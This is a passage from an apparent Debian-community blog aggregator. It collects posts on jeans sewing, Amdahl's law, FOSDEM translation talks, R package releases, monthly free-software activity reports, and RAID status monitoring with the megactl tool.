<p><img alt="A woman wearing another pair of jeans; the waistband here is shaped to fit rather than having elastic." class="align-center" src="https://blog.trueelena.org/blog/2024/03/07-jeans_step_two_and_three_and_four/shaped_waistband_jeans.jpg" style="width: 80.0%;" /></p>
<p>And I have to say, I’m really, really happy with the ones with a shaped
waistband in elastic denim, as they fit even better than the ones with a
straight waistband gathered with elastic. Cutting it requires more
fabric, but I think it’s definitely worth it.</p>
<p>But it will be a problem for a later time: right now three pairs of
jeans are a good number to keep in rotation, and I hope I won’t have to
sew jeans for myself for quite some time.</p>
<p><img alt="A plastic bag with mid-sized offcuts of denim; there is a 30 cm ruler on top that is just wider than the bag" class="align-center" src="https://blog.trueelena.org/blog/2024/03/07-jeans_step_two_and_three_and_four/denim_leftovers.jpg" style="width: 80.0%;" /></p>
<p>I think that the leftovers of plain denim will be used for a skirt or
something else, and as for the leftovers of elastic denim, well, there
aren’t a lot left, but what else I did with them is the topic for
another post.</p>
<p>Thanks to the fact that they are all slightly different, I’ve started to
keep track of the times when I wash each pair, and hopefully I will be
able to see whether the elastic denim is significantly less durable than
the regular, or the added weight compensates for it somewhat. I’m not
sure I’ll manage to remember about saving the data until they get worn,
but if I do it will be interesting to know.</p>
<p>Oh, and I say I’ve finished working on jeans and everything, but I still
haven’t sewn the belt loops to the third pair. And I’m currently wearing
them. It’s a sewist tradition, or something. :D</p>
<section class="footnotes footnotes-end-of-document">
<hr />
<ol>
<li id="fn1"><p>The links are to the shop for Italy; you can copy the
“Codice prodotto” and look for it on one of the shop version for
other countries (where they apply the right vat etc., but sadly they
don’t allow to mix and match those settings and the language).<a class="footnote-back" href="https://blog.trueelena.org#fnref1">↩︎</a></p></li>
</ol>
</section>
</section>
</article>2024-03-07T00:00:00+00:00Elena “of Valhalla”Steinar H. Gunderson: Reverse Amdahl's Law
http://blog.sesse.net/blog/tech/2024-03-06-17-39_reverse_amdahls_law.html
<p>Everybody working in performance knows <a href="https://en.wikipedia.org/wiki/Amdahl%27s_law">Amdahl's law</a>,
and it is usually framed as a negative result; if you optimize
(in most formulations, parallelize) a part of an operation,
you gain diminishing results after a while. (When optimizing a
given fraction p of the total time T by a speedup factor s,
the new time taken is (1-p)T + pT/s.)</p>
<p>However, Amdahl's law also works beautifully in reverse!
When you optimize something, there's usually some limit where
a given optimization isn't worth it anymore; I usually put this
around 1% or so, although of course it varies with the cost of
the optimization and such. (Most people would count 1% as ridiculously
low, but it's usually how mature systems go; you rarely find
single 30% speedups, but you can often find ten smaller speedups and apply
them sequentially. SQLite famously <a href="https://www.sqlite.org/cpu.html">tripled their speed</a>
by chaining optimizations so tiny that they needed to run in a simulator
to measure them.) And as your total runtime becomes smaller,
things that used to not be worth it now pop over that threshold!
If you have enough developer resources and no real upper limit
for how much performance you would want, you can keep going forever.</p>
<p>A different way to look at it is that optimizations give you
compound interest; if measuring in terms of throughput instead
of latency (i.e., items per second instead of seconds per item),
which I contend is the only reasonable way to express performance
percentages, you can simply multiply the factors together.[1] So 1%
and then 1% means 1.01 * 1.01 = 1.0201 = 2.01% speedup and not
2%. Thirty 1% optimizations sum to 34.8%, not 30%.</p>
<p>So here's my formulation of Amdahl's law, in a more positive
light: The more you speed up a given part of a system, the more
impactful optimizations in the other parts will be. So go forth
and fire up those profilers :-)</p>
<p>[1] Obviously throughput measurements are inappropriate if
what you care about is e.g. 99p latency. It is still better to
talk about a 50% speedup than removing 33% of the latency,
though, especially as the speedup factor gets higher.</p>2024-03-06T16:39:00+00:00Steinar H. GundersonPaulo Henrique de Lima Santana: Bits from FOSDEM 2023 and 2024
http://phls.com.br/bits-from-fosdem-2023-and-2024
<p><a href="https://phls.com.br/minha-participacao-nos-fosdem-2023-e-2024">Link para versão em português</a></p>
<h1 id="intro">Intro</h1>
<p>Since 2019, I have traveled to Brussels at the beginning of the year to join <a href="https://fosdem.org/2024/">FOSDEM</a>, considered the largest and most important Free Software event in Europe. The 2024 edition was the fourth in-person edition in a row that I joined (2021 and 2022 did not happen due to COVID-19) and always with the financial help of Debian, which kindly paid my flight tickets after receiving my request asking for help to travel and approved by the Debian leader.</p>
<p>In 2020 I wrote <a href="https://phls.com.br/viagem-de-curitiba-para-bruxelas">several posts</a> with a very complete report of the days I spent in Brussels. But in 2023 I didn’t write anything, and becayse last year and this year I coordinated a room dedicated to translations of Free Software and Open Source projects, I’m going to take the opportunity to write about these two years and how it was my experience.</p>
<p>After my first trip to FOSDEM, I started to think that I could join in a more active way than just a regular attendee, so I had the desire to propose a talk to one of the rooms. But then I thought that instead of proposing a tal, I could organize a room for talks :-) and with the topic “translations” which is something that I’m very interested in, because it’s been a few years since I’ve been helping to translate the Debian for Portuguese.</p>
<h1 id="joining-fosdem-2023">Joining FOSDEM 2023</h1>
<p>In the second half of 2022 I did some research and saw that there had never been a room dedicated to translations, so when the FOSDEM organization opened the <a href="https://archive.fosdem.org/2023/news/2022-09- 29-call_for_devrooms/">call</a> to receive room proposals (called DevRoom) for the 2023 edition, I sent a proposal to a translation room and it was <a href="https://archive.fosdem.org/2023/news /2022-11-07-accepted-developer-rooms/">accepted</a>!</p>
<p>After the room was confirmed, the next step was for me, as room coordinator, to publicize the <a href="https://lists.fosdem.org/pipermail/fosdem/2022q4/003441.html">call for talk proposals</a>. I spent a few weeks hoping to find out if I would receive a good number of proposals or if it would be a failure. But to my happiness, I received eight proposals and I had to select six to schedule the <a href="https://archive.fosdem.org/2023/schedule/track/translations/">room programming schedule</a> due to time constraints .</p>
<p><a href="https://archive.fosdem.org/2023">FOSDEM 2023</a> took place from February 4th to 5th and the translation devroom was scheduled on the second day in the afternoon.</p>
<p><img alt="Fosdem 2023" src="https://phls.com.br/assets/img/fosdem-2023-063.jpg" /></p>
<p>The talks held in the room were these below, and in each of them you can watch the recording video.</p>
<ul>
<li><a href="https://archive.fosdem.org/2023/schedule/event/translations_welcome_to_the_translations_devroom/">Welcome to the Translations DevRoom</a>.
<ul>
<li>Paulo Henrique de Lima Santana</li>
</ul>
</li>
<li><a href="https://archive.fosdem.org/2023/schedule/event/translations_translate_all_the_things/">Translate All The Things!</a> An Introduction to LibreTranslate.
<ul>
<li>Piero Toffanin</li>
</ul>
</li>
<li><a href="https://archive.fosdem.org/2023/schedule/event/translations_bringing_your_project_closer_to_users_translating_libre_with_weblate/">Bringing your project closer to users - translating libre with Weblate</a>. News, features and plans of the project.
<ul>
<li>Benjamin Alan Jamie</li>
</ul>
</li>
<li><a href="https://archive.fosdem.org/2023/schedule/event/translations_20_years_with_gettext/">20 years with Gettext</a>. Experiences from the PostgreSQL project.
<ul>
<li>Peter Eisentraut</li>
</ul>
</li>
<li><a href="https://archive.fosdem.org/2023/schedule/event/translations_building_an_atractive_way_in_an_old_infra_for_new_translators/">Building an atractive way in an old infra for new translators</a>.
<ul>
<li>Texou</li>
</ul>
</li>
<li><a href="https://archive.fosdem.org/2023/schedule/event/translations_managing_kdes_translation_project/">Managing KDE’s translation project</a>. Are we the biggest FLOSS translation project?
<ul>
<li>Albert Astals Cid</li>
</ul>
</li>
<li><a href="https://archive.fosdem.org/2023/schedule/event/translations_translating_documentation_with_cloud_tools_and_scripts/">Translating documentation with cloud tools and scripts</a>. Using cloud tools and scripts to translate, review and update documents.
<ul>
<li>Nilo Coutinho Menezes</li>
</ul>
</li>
</ul>
<p>And on the first day of FOSDEM I was at the Debian stand selling the t-shirts that I had taken from Brazil. People from France were also there selling other products and it was cool to interact with people who visited the booth to buy and/or talk about Debian.</p>
<p><br />
<img alt="Fosdem 2023" src="https://phls.com.br/assets/img/fosdem-2023-016.jpg" />
<br /><br />
<img alt="Fosdem 2023" src="https://phls.com.br/assets/img/fosdem-2023-019.jpg" />
<br /></p>
<p><a href="https://photos.app.goo.gl/fB6wH37b2pFBqiNZ9">Photos</a></p>
<h1 id="joining-fosdem-2024">Joining FOSDEM 2024</h1>
<p>The 2023 result motivated me to propose the translation devroom again when the FOSDEM 2024 organization opened the <a href="https://fosdem.org/2024/news/2023-09-29-devrooms-cfp/">call for rooms</a> . I was waiting to find out if the FOSDEM organization would accept a room on this topic for the second year in a row and to my delight, my proposal was <a href="https://fosdem.org/2024/news/2023-11-08- devrooms-announced/">accepted</a> again :-)</p>
<p>This time I received 11 proposals! And again due to time constraints, I had to select six to schedule the <a href="https://fosdem.org/2024/schedule/track/translations/">room schedule grid</a>.</p>
<p><a href="https://fosdem.org/2024/">FOSDEM 2024</a> took place from February 3rd to 4th and the translation devroom was scheduled for the second day again, but this time in the morning.</p>
<p>The talks held in the room were these below, and in each of them you can watch the recording video.</p>
<ul>
<li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-3516-welcome-to-the-translations-devroom/">Welcome to the Translations DevRoom</a>.
<ul>
<li>Paulo Henrique de Lima Santana</li>
</ul>
</li>
<li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-2624-localization-of-open-source-tools-into-swahili/">Localization of Open Source Tools into Swahili</a>.
<ul>
<li>Cecilia Maundu</li>
</ul>
</li>
<li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-1759-a-universal-data-model-for-localizable-messages/">A universal data model for localizable messages</a>.
<ul>
<li>Eemeli Aro</li>
</ul>
</li>
<li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-3236-happy-translating-it-is-possible-to-overcome-the-language-barrier-in-open-source-/">Happy translating! It is possible to overcome the language barrier in Open Source!</a>
<ul>
<li>Wentao Liu</li>
</ul>
</li>
<li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-1906-lessons-learnt-as-a-translation-contributor-the-past-4-years/">Lessons learnt as a translation contributor the past 4 years</a>.
<ul>
<li>Tom De Moor</li>
</ul>
</li>
<li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-2071-long-term-effort-to-keep-translations-up-to-date/">Long Term Effort to Keep Translations Up-To-Date</a>.
<ul>
<li>Andika Triwidada</li>
</ul>
</li>
<li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-3348-using-open-source-ais-for-accessibility-and-localization/">Using Open Source AIs for Accessibility and Localization</a>.
<ul>
<li>Nevin Daniel</li>
</ul>
</li>
</ul>
<p>This time I didn’t help at the Debian stand because I couldn’t bring t-shirts to sell from Brazil. So I just stopped by and talked to some people who were there like some DDs. But I volunteered for a few hours to operate the streaming camera in one of the main rooms.</p>
<p><br />
<img alt="Fosdem 2024" src="https://phls.com.br/assets/img/fotos-fosdem-2024-037.jpg" />
<br /><br />
<img alt="Fosdem 2024" src="https://phls.com.br/assets/img/fotos-fosdem-2024-015.jpg" />
<br /></p>
<p><a href="https://photos.app.goo.gl/KrSvUFYTGkzb9kfz5">Photos</a></p>
<h1 id="conclusion">Conclusion</h1>
<p>The topics of the talks in these two years were quite diverse, and all the lectures were really very good. In the 12 talks we can see how translations happen in some projects such as KDE, PostgreSQL, Debian and Mattermost. We had the presentation of tools such as LibreTranslate, Weblate, scripts, AI, data model. And also reports on the work carried out by communities in Africa, China and Indonesia.</p>
<p>The rooms were full for some talks, a little more empty for others, but I was very satisfied with the final result of these two years.</p>
<p>I leave my special thanks to <a href="https://jonathancarter.org/">Jonathan Carter</a>, Debian Leader who approved my flight tickets requests so that I could join FOSDEM 2023 and 2024. This help was essential to make my trip to Brussels because flight tickets are not cheap at all.</p>
<p>I would also like to thank my wife Jandira, who has been my travel partner :-)</p>
<p><img alt="Bruxelas" src="https://phls.com.br/assets/img/bruxelas-2023-187.jpg" /></p>
<p>As there has been an increase in the number of proposals received, I believe that interest in the translations devroom is growing. So I intend to send the devroom proposal to FOSDEM 2025, and if it is accepted, wait for the future Debian Leader to approve helping me with the flight tickets again. We’ll see.</p>2024-03-04T23:50:00+00:00Paulo Henrique de Lima SantanaDirk Eddelbuettel: tinythemes 0.0.2 at CRAN: Maintenance
http://dirk.eddelbuettel.com/blog/2024/03/04#tinythemes_0.0.2
<p>A first maintenance of the still fairly new package <a href="https://github.com/eddelbuettel/tinythemes">tinythemes</a> arrived
on <a href="https://cran.r-project.org">CRAN</a> today. <a href="https://github.com/eddelbuettel/tinythemes">tinythemes</a>
provides the <code>theme_ipsum_rc()</code> function from <a href="https://github.com/hrbrmstr/hrbrthemes">hrbrthemes</a> by <a href="https://rud.is/">Bob Rudis</a> in a zero (added) dependency way. A
simple example is (also available as a demo inside the package)
contrasts the default style (on left) with the one added by this package
(on the right):</p>
<p><img src="https://eddelbuettel.github.io/images/2023-12-18/tinythemes_demo.png" style="width: 99.0%;" /></p>
<p>This version mostly just updates to the newest releases of <a href="https://cran.r-project.org/package=ggplot2">ggplot2</a> as one
must, and takes advantage of Bob’s update to <a href="https://github.com/hrbrmstr/hrbrthemes">hrbrthemes</a>
yesterday.</p>
<p>The full set of changes since the initial <a href="https://cran.r-project.org">CRAN</a> release follows.</p>
<blockquote>
<h4 id="changes-in-spdl-version-0.0.2-2024-03-04">Changes in spdl
version 0.0.2 (2024-03-04)</h4>
<ul>
<li><p>Added continuous integrations action based on r2u</p></li>
<li><p>Added <code>demo/</code> directory and a READNE.md</p></li>
<li><p>Minor edits to help page content</p></li>
<li><p>Synchronised with <span class="pkg">ggplot2</span> 3.5.0 via
<span class="pkg">hrbrthemes</span></p></li>
</ul>
</blockquote>
<p>Courtesy of my <a href="https://dirk.eddelbuettel.com/cranberries/">CRANberries</a>, there
is a <a href="https://dirk.eddelbuettel.com/cranberries/2024/03/04/#tinythemes_0.0.2">diffstat
report</a> relative to previous release. More detailed information is on
the <a href="https://github.com/eddelbuettel/tinythemes">repo</a> where
comments and suggestions are welcome.</p>
<p>If you like this or other open-source work I do, you can <a href="https://github.com/sponsors/eddelbuettel">sponsor me at
GitHub</a>.</p>
<p style="font-size: 80%; font-style: italic;">
This post by <a href="https://dirk.eddelbuettel.com">Dirk
Eddelbuettel</a> originated on his <a href="https://dirk.eddelbuettel.com/blog/">Thinking inside the box</a>
blog. Please report excessive re-aggregation in third-party for-profit
settings.
</p><p></p>2024-03-04T22:58:00+00:00Dirk EddelbuettelColin Watson: Free software activity in January/February 2024
https://www.chiark.greenend.org.uk/~cjwatson/blog/activity-2024-02.html
<p>Two months into my <a href="https://www.chiark.greenend.org.uk/~cjwatson/blog/going-freelance.html">new gig</a> and it’s going
great! <a href="https://www.chiark.greenend.org.uk/~cjwatson/blog/task-management.html">Tracking my time</a> has taken a bit of
getting used to, but having something that amounts to a queryable database
of everything I’ve done has also allowed some helpful introspection.</p>
<p>Freexian <a href="https://www.freexian.com/about/debian-contributions/">sponsors</a> up
to 20% of my time on Debian tasks of my choice. In fact I’ve been spending
the bulk of my time on
<a href="https://freexian-team.pages.debian.net/debusine/">debusine</a> which is itself
intended to accelerate work on Debian, but more details on that later.
While I contribute to Freexian’s
<a href="https://www.freexian.com/tags/debian-contributions/">summaries</a> now, I’ve
also decided to start writing monthly posts about my free software activity
as many others do, to get into some more detail.</p>
<h2>January 2024</h2>
<ul>
<li>I <a href="https://salsa.debian.org/ci-team/autopkgtest/-/merge_requests/272">added Incus
support</a>
to autopkgtest. <a href="https://linuxcontainers.org/incus/">Incus</a> is a system
container and virtual machine manager, forked from <a href="https://github.com/canonical/lxd">Canonical’s
<span class="caps">LXD</span></a>. I switched my laptop over to it
and then quickly found that it was inconvenient not to be able to run
Debian package test suites using
<a href="https://manpages.debian.org/man/autopkgtest">autopkgtest</a>, so I tweaked
autopkgtest’s existing <span class="caps">LXD</span> integration to support using either <span class="caps">LXD</span> or Incus.</li>
<li>I discovered <a href="https://metacpan.org/dist/Perl-Critic">Perl::Critic</a> and
used it to tidy up some poor practices in several of my packages,
including debconf. Perl used to be my language of choice but I’ve been
mostly using Python for over a decade now, so I’m not as fluent as I used
to be and some mechanical assistance with spotting common errors is
helpful; besides, I’m generally a big fan of applying static analysis to
everything possible in the hope of reducing bug density. Of course, this
did result in a couple of regressions
(<a href="https://salsa.debian.org/pkg-debconf/debconf/-/commit/4f8b9f969679fa4a38aca8da2702057ea861ffae">1</a>,
<a href="https://salsa.debian.org/pkg-debconf/debconf/-/commit/7274bf66e82b2557156813f93ed0592539a2ac1c">2</a>),
but at least we caught them fairly quickly.</li>
<li>I did some overdue debconf maintenance, mainly around tidying up error
message handling in several places (<a href="https://bugs.debian.org/797071">1</a>,
<a href="https://bugs.debian.org/754123">2</a>,
<a href="https://bugs.debian.org/682508">3</a>).</li>
<li>I did some routine maintenance to move several of my upstream projects to
a new <a href="https://www.gnu.org/software/gnulib/manual/html_node/Stable-Branches.html">Gnulib stable
branch</a>.</li>
<li><a href="https://salsa.debian.org/debian/debmirror">debmirror</a> includes a <a href="https://salsa.debian.org/debian/debmirror/-/blob/master/mirror_size">useful
summary</a>
of how big a Debian mirror is, but it hadn’t been updated since 2010 and
the script to do so had bitrotted quite badly. I <a href="https://salsa.debian.org/debian/debmirror/-/commit/7ae93742377d9205c57b7e47ef96d4663110f0ff">fixed
that</a>
and added a recurring task for myself to refresh this every six months.</li>
</ul>
<h2>February 2024</h2>
<ul>
<li>Some time back I added AppArmor and seccomp confinement to man-db. This
was mainly motivated by a desire to <a href="https://forum.snapcraft.io/t/support-for-man-pages/2299/24">support manual pages in
snaps</a> (which
is <a href="https://bugs.launchpad.net/snapd/+bug/1575593">still open</a> several
years later …), but since reading manual pages involves a <a href="https://www.gnu.org/software/groff/">non-trivial
text processing toolchain mostly written in
C++</a>, I thought it was reasonable to
assume that some day it might have a vulnerability even though its track
record has been good; so <code>man</code> now restricts the system calls that
<code>groff</code> can execute and the parts of the file system that it can access.
I stand by this, but it did cause some problems that have needed a
succession of small fixes over the years. This month I issued
<a href="https://lists.debian.org/debian-lts-announce/2024/02/msg00001.html"><span class="caps">DLA</span>-3731-1</a>,
backporting some of those fixes to buster.</li>
<li>I spent some time chasing a <a href="https://bugs.debian.org/1063413">console-setup build
failure</a> following the removal of
kFreeBSD support, which was uploaded by mistake. I suggested a <a href="https://salsa.debian.org/holgerw/console-setup/-/merge_requests/1">set of
fixes</a>
for this, but the author of the change to remove kFreeBSD support decided
to take a different approach (fair enough), so I’ve abandoned this.</li>
<li>I updated the <a href="https://tracker.debian.org/pkg/zope.testrunner">Debian zope.testrunner
package</a> to 6.3.1.</li>
<li>openssh:<ul>
<li>A Freexian collaborator had a problem with automating installations
involving changes to <code>/etc/ssh/sshd_config</code>. This turned out to be
resolvable without any changes, but in the process of investigating I
noticed that my dodgy arrangements to avoid
<a href="https://manpages.debian.org/man/ucf">ucf</a> prompts in certain cases
had bitrotted slightly, which meant that some people might be prompted
unnecessarily. I <a href="https://salsa.debian.org/ssh-team/openssh/-/commit/b9671cc74475922fa61e9ebdba56ec84446d19ac">fixed this and arranged for it not to happen
again</a>.</li>
<li>Following a <a href="https://lists.debian.org/debian-devel/2024/02/msg00239.html">recent debian-devel
discussion</a>,
I realized that some particularly awkward code in the OpenSSH
packaging was now obsolete, and <a href="https://salsa.debian.org/ssh-team/openssh/-/commit/a6c7b9ef532489671e3a654ad38102cc30d94b5a">removed
it</a>.</li>
</ul>
</li>
<li>I backported a <a href="https://bugs.debian.org/1027387">python-channels-redis
fix</a> to bookworm. I wasn’t the first
person to run into this, but I rediscovered it while working on debusine
and it was confusing enough that it seemed worth fixing in stable.</li>
<li>I fixed a <a href="https://bugs.debian.org/1064699">simple build failure in
storm</a>.</li>
<li>I dug into a very confusing cluster of celery build failures
(<a href="https://bugs.debian.org/1056232">1</a>,
<a href="https://bugs.debian.org/1058317">2</a>,
<a href="https://bugs.debian.org/1063345">3</a>), and tracked the hardest bit down
to a <a href="https://github.com/python/cpython/issues/115874">Python 3.12
regression</a>, now fixed
in unstable thanks to Stefano Rivera. Getting celery back into testing
is blocked on the <a href="https://wiki.debian.org/ReleaseGoals/64bit-time">64-bit <code>time_t</code>
transition</a> for now, but
once that’s out of the way it should flow smoothly again.</li>
</ul>2024-03-04T10:39:50+00:00Colin WatsonIustin Pop: New corydalis 2024.9.0 release!
https://k1024.org/posts/2024/2024-03-03-new-corydalis-release/
<p>Obligatory and misused quote: <em>It’s not dead, Jim!</em></p>
<p>I’ve kind of dropped by ball lately on organising my own photo
collection, but February was a pretty good month and I managed to
write some more code for
<a href="https://github.com/iustin/corydalis">Corydalis</a>, ending up with the
aforementioned <a href="https://github.com/iustin/corydalis/releases/tag/v2024.9.0">new
release</a>.</p>
<p>The release is not a big one, but I did manage to solve one thing that
was annoying me <em>greatly</em>: that lack of ability to play videos inline
in one of the two picture viewing modes (in my preferred mode, in
fact). Now, whether you’re browsing through pictures, or looking at
pictures one-by-one, you can in both cases play videos easily, and to
some extent, “as it should be”. No user docs for that, yet (I actually
need to split the manual in user/admin/developer parts)</p>
<p>I did some more internal cleanups, and I’ve enabled building release
zips (since that’s how GitHub actions creates artifacts), which means
it should be 10% easier to test this. The rest 90% is configuring it
and pointing to picture folders and and and, so this is definitely not
plug-and-play.</p>
<p>The diff summary between <code>2023.44.0</code> and <code>2024.9.0</code> is: 56 files
changed, 1412 insertions(+), 700 deletions(-). Which is not bad, but
also not too much. The biggest churn was, as expected, in the viewer
(due to the aforementioned video playing). The “scary” part is that
the TypeScript code is not at 7.9% (and a tiny more JS, which I can’t
convert yet due to lack of type definitions upstream). I say scary in
quotes, because I would actually like to know Typescript better, but
no time.</p>
<p>The new release can be seen in action on
<a href="https://demo.corydalis.io">demo.corydalis.io</a>, and as always, just
after release I found two minor issues:</p>
<ul>
<li>The GitHub actions don’t retrieve the tags <a href="https://github.com/actions/checkout/issues/701">by
default</a>, actually
they didn’t use to retrieve tags at all, but that’s fixed now, just
needs configuration, so the public build just says “<em>Corydalis
fbe0088, built on Mar 3 2024.</em>” (which is the correct hash value, at
least).</li>
<li>I don’t have videos on the public web site, so the new functionality
is not visible. I’m not sure I want to add real videos
(size/bandwidth), hmm 🤨.</li>
</ul>
<p>Well, there will be future releases. For now, I’ve made an open-source
package release, which I didn’t do in a while, so I’m happy 😁. See
you!</p>2024-03-03T22:15:00+00:00Iustin PopPetter Reinholdtsen: RAID status from LSI Megaraid controllers using free software
https://people.skolelinux.org/pere/blog/RAID_status_from_LSI_Megaraid_controllers_using_free_software.html
<p>The last few days I have revisited RAID setup using the LSI
Megaraid controller. These are a family of controllers called PERC by
Dell, and is present in several old PowerEdge servers, and I recently
got my hands on one of these. I had forgotten how to handle this RAID
controller in Debian, so I had to take a peek in the
<a href="https://wiki.debian.org/LinuxRaidForAdmins">Debian wiki page
"Linux and Hardware RAID: an administrator's summary"</a> to remember
what kind of software is available to configure and monitor the disks
and controller. I prefer Free Software alternatives to proprietary
tools, as the later tend to fall into disarray once the manufacturer
loose interest, and often do not work with newer Linux Distributions.
Sadly there is no free software tool to configure the RAID setup, only
to monitor it. RAID can provide improved reliability and resilience in
a storage solution, but only if it is being regularly checked and any
broken disks are being replaced in time. I thus want to ensure some
automatic monitoring is available.</p>
<p>In the discovery process, I came across a old free software tool to
monitor PERC2, PERC3, PERC4 and PERC5 controllers, which to my
surprise is not present in debian. To help change that I created a
<a href="https://bugs.debian.org/1065322">request for packaging of the
megactl package</a>, and tried to track down a usable version.
<a href="https://sourceforge.net/p/megactl/">The original project
site</a> is on Sourceforge, but as far as I can tell that project has
been dead for more than 15 years. I managed to find a
<a href="https://github.com/hmage/megactl">more recent fork on
github</a> from user hmage, but it is unclear to me if this is still
being maintained. It has not seen much improvements since 2016. A
<a href="https://github.com/namiltd/megactl">more up to date
edition</a> is a git fork from the original github fork by user
namiltd, and this newer fork seem a lot more promising. The owner of
this github repository has replied to change proposals within hours,
and had already added some improvements and support for more hardware.
Sadly he is reluctant to commit to maintaining the tool and stated in
<a href="https://github.com/namiltd/megactl/pull/1">my first pull
request</a> that he think a new release should be made based on the
git repository owned by hmage. I perfectly understand this
reluctance, as I feel the same about maintaining yet another package
in Debian when I barely have time to take care of the ones I already
maintain, but do not really have high hopes that hmage will have time
to spend on it and hope namiltd will change his mind.</p>
<p>In any case, I created
<a href="https://salsa.debian.org/debian/megactl">a draft package</a>
based on the namiltd edition and put it under the debian group on
salsa.debian.org. If you own a Dell PowerEdge server with one of the
PERC controllers, or any other RAID controller using the megaraid or
megaraid_sas Linux kernel modules, you might want to check it out. If
enough people are interested, perhaps the package will make it into
the Debian archive.</p>
<p>There are two tools provided, megactl for the megaraid Linux kernel
module, and megasasctl for the megaraid_sas Linux kernel module. The
simple output from the command on one of my machines look like this
(yes, I know some of the disks have problems. :).</p>
<pre># megasasctl
a0 PERC H730 Mini encl:1 ldrv:2 batt:good
a0d0 558GiB RAID 1 1x2 optimal
a0d1 3067GiB RAID 0 1x11 optimal
a0e32s0 558GiB a0d0 online errs: media:0 other:19
a0e32s1 279GiB a0d1 online
a0e32s2 279GiB a0d1 online
a0e32s3 279GiB a0d1 online
a0e32s4 279GiB a0d1 online
a0e32s5 279GiB a0d1 online
a0e32s6 279GiB a0d1 online
a0e32s8 558GiB a0d0 online errs: media:0 other:17
a0e32s9 279GiB a0d1 online
a0e32s10 279GiB a0d1 online
a0e32s11 279GiB a0d1 online
a0e32s12 279GiB a0d1 online
a0e32s13 279GiB a0d1 online
#
</pre>
<p>In addition to displaying a simple status report, it can also test
individual drives and print the various event logs. Perhaps you too
find it useful?</p>
<p>In the packaging process I provided some patches upstream to
improve installation and ensure
a Appstream
metainfo file is provided to list all supported HW, to allow
<a href="https://tracker.debian.org/isenkram">isenkram</a> to propose
the package on all servers with a relevant PCI card.</p>
<p>As usual, if you use Bitcoin and want to show your support of my
activities, please send Bitcoin donations to my address
<b><a>15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b</a></b>.</p>2024-03-03T21:40:00+00:00Petter ReinholdtsenDirk Eddelbuettel: RcppArmadillo 0.12.8.1.0 on CRAN: Upstream Fix, Interface Polish
http://dirk.eddelbuettel.com/blog/2024/03/03#rcpparmadillo_0.12.8.1.0
<p><img alt="armadillo image" src="http://dirk.eddelbuettel.com/images/armadillo_logo_two.png" style="float: left; margin: 10px 10px 10px 0;" /></p>
<p><a href="https://arma.sourceforge.net/">Armadillo</a> is a powerful
and expressive C++ template library for linear algebra and scientific
computing. It aims towards a good balance between speed and ease of use,
has a syntax deliberately close to Matlab, and is useful for algorithm
development directly in C++, or quick conversion of research code into
production environments. <a href="https://dirk.eddelbuettel.com/code/rcpp.armadillo.html">RcppArmadillo</a>
integrates this library with the <a href="https://www.r-project.org">R</a> environment and language–and is
widely used by (currently) 1130 other packages on <a href="https://cran.r-project.org">CRAN</a>, downloaded 32.8 million
times (per the partial logs from the cloud mirrors of CRAN), and the <a href="https://doi.org/10.1016/j.csda.2013.02.005">CSDA paper</a> (<a href="https://cran.r-project.org/package=RcppArmadillo/vignettes/RcppArmadillo-intro.pdf">preprint
/ vignette</a>) by Conrad and myself has been cited 578 times according
to Google Scholar.</p>
<p>This release brings a new upstream bugfix release Armadillo 12.8.1
prepared by <a href="https://conradsanderson.id.au/">Conrad</a>
yesterday. It was delayed for a few hours as <a href="https://cran.r-project.org">CRAN</a> noticed an error in one
package which we all concluded was spurious as it could be reproduced
outside of the one run there. Following from the previous release, we
also use the slighty faster ‘Lighter’ header in the examples. And once
it got to <a href="https://cran.r-project.org">CRAN</a> I also updated
the <a href="https://www.debian.org">Debian</a> package.</p>
<p>The set of changes since the last <a href="https://cran.r-project.org">CRAN</a> release follows.</p>
<blockquote>
<h4 id="changes-in-rcpparmadillo-version-0.12.8.1.0-2024-03-02">Changes
in RcppArmadillo version 0.12.8.1.0 (2024-03-02)</h4>
<ul>
<li><p>Upgraded to Armadillo release 12.8.1 (Cortisol Injector)</p>
<ul>
<li>Workaround in <code>norm()</code> for yet another bug in macOS
accelerate framework</li>
</ul></li>
<li><p>Update README for RcppArmadillo usage counts</p></li>
<li><p>Update examples to use '#include <RcppArmadillo/Lighter>'
for faster compilation excluding unused Rcpp features</p></li>
</ul>
</blockquote>
<p>Courtesy of my <a href="https://dirk.eddelbuettel.com/cranberries/">CRANberries</a>, there
is a <a href="https://dirk.eddelbuettel.com/cranberries/2024/03/03/#RcppArmadillo_0.12.8.1.0">diffstat
report</a> relative to previous release. More detailed information is on
the <a href="https://dirk.eddelbuettel.com/code/rcpp.armadillo.html">RcppArmadillo
page</a>. Questions, comments etc should go to the <a href="https://lists.r-forge.r-project.org/cgi-bin/mailman/listinfo/rcpp-devel">rcpp-devel
mailing list</a> off the <a href="https://r-forge.r-project.org/projects/rcpp/">Rcpp R-Forge</a>
page.</p>
<p>If you like this or other open-source work I do, you can <a href="https://github.com/sponsors/eddelbuettel">sponsor me at
GitHub</a>.</p>
<p style="font-size: 80%; font-style: italic;">
This post by <a href="https://dirk.eddelbuettel.com">Dirk
Eddelbuettel</a> originated on his <a href="https://dirk.eddelbuettel.com/blog/">Thinking inside the box</a>
blog. Please report excessive re-aggregation in third-party for-profit
settings.
</p><p></p>2024-03-03T21:14:00+00:00Dirk EddelbuettelBen Hutchings: FOSS activity in February 2024
https://www.decadent.org.uk/ben/blog/2024/03/03/foss-activity-in-february-2024.html
<ul>
<li>I updated the Linux kernel packages in various Debian suites:
<ul>
<li>buster: Updated linux-5.10 to the latest security update for
bullseye, and uploaded it, but it still needs to be approved.</li>
<li>bullseye-backports: Updated linux (6.1) to the latest security
update from bullseye, and uploaded it.</li>
<li>bookworm-backports: Updated linux to the current version in
testing, and uploaded it.</li>
</ul>
</li>
<li>I reported a <a href="https://bugs.debian.org/1064035">regression in documentation
builds</a> in the Linux 5.10 stable
branch.</li>
</ul>2024-03-03T19:28:18+00:00Ben HutchingsPaul Wise: FLOSS Activities Feb 2024
http://bonedaddy.net/pabs3/log/2024/03/03/floss-activities/
<h1 id="focus">Focus</h1>
<p>This month I didn't have any particular focus.
I just worked on issues in my info bubble.</p>
<h1 id="changes">Changes</h1>
<ul>
<li>check-all-the-things:
